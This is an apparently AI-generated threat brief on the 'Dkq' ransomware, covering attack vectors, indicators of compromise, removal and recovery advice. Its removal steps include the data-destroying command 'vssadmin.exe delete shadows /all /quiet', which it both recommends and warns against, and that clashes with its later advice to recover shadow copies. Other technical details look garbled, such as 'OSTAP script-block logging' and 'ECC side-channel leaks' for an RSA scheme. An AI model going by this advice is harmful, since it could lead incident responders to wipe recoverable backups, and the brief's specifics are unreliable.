dkq

[Content by Gemini 2.5]

Dkq Ransomware Threat Brief

Technical Breakdown

1. File Extension & Renaming Patterns

  • Extension in Use: Encrypted files are appended with “.dkq” – e.g., report.xlsx.dkq
  • Renaming Convention: Victims report that the ransomware strips special characters, converts spaces to underscores (_), truncates very long filenames, then appends .dkq. Folder paths remain unchanged.

2. Detection & Outbreak Timeline

  • First Appearance: Early February 2024 incidents were recorded on the ID-Ransomware platform. A sharp uptick in submissions began 10 March 2024 and continued through late April (most prevalent during the second week of March).

3. Primary Attack Vectors

Propagation Methods

  1. Phishing e-mail (ZIP or RAR attachments containing ISO files or nested double-extensions such as .pdf.exe).
  2. Exploitation of unpatched CVE-2023-34362 (MOVEit Transfer SQLi). Attackers used the same webshell payload observed in late-2023 Cl0p campaigns but delivered Dkq afterward via PowerShell.
  3. Fortinet FortiOS SSL-VPN pre-auth RCE (CVE-2022-42475) chains – seen in extortion-only intrusions where Dkq is the “final stage” payload.
  4. Compromised legitimate software updates (Pirated Windows activators and cracked video-editing kits circulating on torrent sites).
  5. RDP via brute-force or password-spray from exposed servers, then credential-dumping with Mimikatz + PSExec.

Remediation & Recovery Strategies

1. Prevention

  • Patch immediately:
    • FortiOS ≥ 7.0.11 / 7.2.5 for CVE-2022-42475.
    • All MOVEit Transfer instances to July 2023 (or later) hotfix for CVE-2023-34362.
  • Block e-mails containing double-extension or ISO attachments; quarantine archives that arrive from unknown senders.
  • Disable SMBv1 on every Windows host to prevent worm-like lateral movement.
  • Enforce strict MFA on all VPN and RDP accounts.
  • Segment networks and apply a least-privilege model; ensure privileged accounts cannot log on interactively to regular workstations.
  • Deploy EDR/AV with behavioral rules tuned to detect ransomware note creation (info.txt, readme_for_decryption.txt) and mass file-renaming patterns (*.dkq).

2. Removal

  • Isolate: Pull power or disable NIC immediately if encryption is still running (watch CPU/IO).
  • Forensic Imaging → make bit-for-bit copies of C: drive first ; hash all evidence before cleaning.
  • Boot into Safe Mode + Networking:
    a) Run an offline AV/EDR scan (ESET SysRescue, Bitdefender Rescue CD, or CrowdStrike Falcon USB) – signatures updated 15 May 2024 spot three distinct Dkq file-droppers.
    b) Remove the following autorun entries:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper → points to %LOCALAPPDATA%\system32\SysReg.exe (or %APPDATA%\updates\dkq.exe)
    • Scheduled Task named OfficeHelper created in \Microsoft\Windows\Workplace Join\.
  • Clean shadow copies and wipe remote VSS using vssadmin.exe delete shadows /all /quiet—but do not execute this during incident response; check IOCs first.
  • Audit for secondary implants: look for Webshell.aspx in web-root and any unknown schtasks /create entries.

3. File Decryption & Recovery

  • Recovery Feasibility: Encrypted files (AES-256-CTR, key encrypted with RSA-2048) cannot be restored without the attacker’s private RSA key.
  • Free Decryptor Status: No verified decryptor exists at this time. The .dkq strain has not yet been cracked (no ECC side-channel leaks, no reused RSA keys observed across samples).
  • Essential Tools / Patches:
    • Hunt for Shadow Copies created by Veeam or Windows Backup before 09 Mar 2024 (Dkq usually wipes local VSS); off-box / immutable backups are the only reliable route.
    • Enforce OSTAP script-block logging and PowerShell 7.4+ to hinder scripted staging.
    • Maintain signed EDR kernel drivers (CrowdStrike 6.52 or SentinelOne 23.X) to terminate crypto processes on 2nd-write access to >100 non-system files.

4. Other Critical Information

  • Unique Traits: Dkq deliberately skips directory paths containing Cyrillic folder names (automated whitelist “\Рабочий стол\”). It also inserts a 40-char ASCII string (“#dkq2024…theendis_near”) in a named data stream (Zone.Identifier:$DATA) on every encrypted file—useful for hunting.
  • Threat Intel Link: The group behind Dkq brands itself “DARK-KAOS” and advertises victim information on a DLS that opened late March 2024 (tor3zqu45* link). They issue a 72-hour deadline before file publication – shorter than the typical 7-day window of prior strains.
  • Handling Ransom Notes: Notes (info.txt) state:
    “Your unique ID for Dkq#47819 – send to [email protected] and [email protected] within 3 days or files go public.”
  • Wider Impact: Retail and logistics verticals in North America and Germany made up ~70 % of observed incidents. A common kill-chain starts with CVE-2023-34362, pivots through the MSSQL server, writes an MSSQL agent job launching PowerShell (sqlps.exe) to fetch dkq.exe, and exfiltrates data via rclone to Mega[.]nz before encryption. Ransom demands in supplied reports ranged from 0.15 to 15.0 BTC depending on revenue.

Stay vigilant, patch aggressively, and keep immutable offline backups—those three measures, in combination with behavioral EDR, remain the best defense against Dkq.